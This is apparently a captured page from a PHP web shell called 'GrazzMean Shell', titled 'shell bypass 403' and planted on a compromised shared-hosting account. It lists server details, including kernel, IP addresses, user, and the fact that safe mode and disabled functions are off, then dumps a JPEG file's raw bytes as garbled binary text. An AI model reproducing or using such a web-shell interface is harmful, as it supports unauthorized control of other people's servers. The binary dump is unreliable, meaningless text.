shell bypass 403

GrazzMean Shell

: /home/workvvfb/.trash/2019/12/ [ drwxr-xr-x ]
Uname: Linux premium264.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Software: LiteSpeed
PHP version: 8.3.22 [ PHP INFO ] PHP os: Linux
Server Ip: 69.57.162.13
Your Ip: 216.73.216.219
User: workvvfb (1129) | Group: workvvfb (1084)
Safe Mode: OFF
Disable Function:
NONE

name : vivo-y15-50x50.jpg
���JFIF��ExifII*��+http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:9546180B82FC11E5B1CCBEC7FD0895A5" xmpMM:DocumentID="xmp.did:9546180C82FC11E5B1CCBEC7FD0895A5"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9546180982FC11E5B1CCBEC7FD0895A5" stRef:documentID="xmp.did:9546180A82FC11E5B1CCBEC7FD0895A5"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��C				

!'"#%%%),($+!$%$��C				$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$��22"����4
!�"1As#34Qaq���$2b������ !1"2q��?�G����8�{��b��K%���ǵ%Զ3�5�m�\�M�o}�^rZTڊII
��U!w�M��i��(�EJ�p�&������G=׺�[/�V�����vf[�q*XQR@$7���Y5L��eDr��
�)(}/(�J@�U3��/[�l���o.�g�����W���x��f�u~�8��~q�>"�-�%c���{��%Lum�����d��+�{l
�׼�ΤP��)@V�zq�|u0㭹�Q��9���Uڧ˺��$�:"RT�w�x�����f�[eڣ7*h���Ӈ	V[s9�<3TLq�%&��c[Pñd.�� (!y(C��x��+��l�9��:�nSv�%�E�ToF[-�e�����<G�U�t8w���5�;���t���l)"L&�2�e�XOJ��x�W���kJsr�d�QP�qWxԖ�?�{��/w���T����΢X�iJP'���-%��G���-{�a�	���.��\luW�s"�C��%�6���p*'#�wf��6}gkj�{�eGK��-i� ���Mh��w��iJF��JA�T��3���<�NJm�e��T~��U�XU�<λ�CM+&?�Oe_?�t�؎�~��k�gf�cEOm�=e�u��Z�\W�
�;D�f��jL���[XQ)ex8Q�`���{KF��ZofqR:oߟ��:�!d����I餬M}JmĎ�qR��M)JJR�R���()J��
© 2025 GrazzMean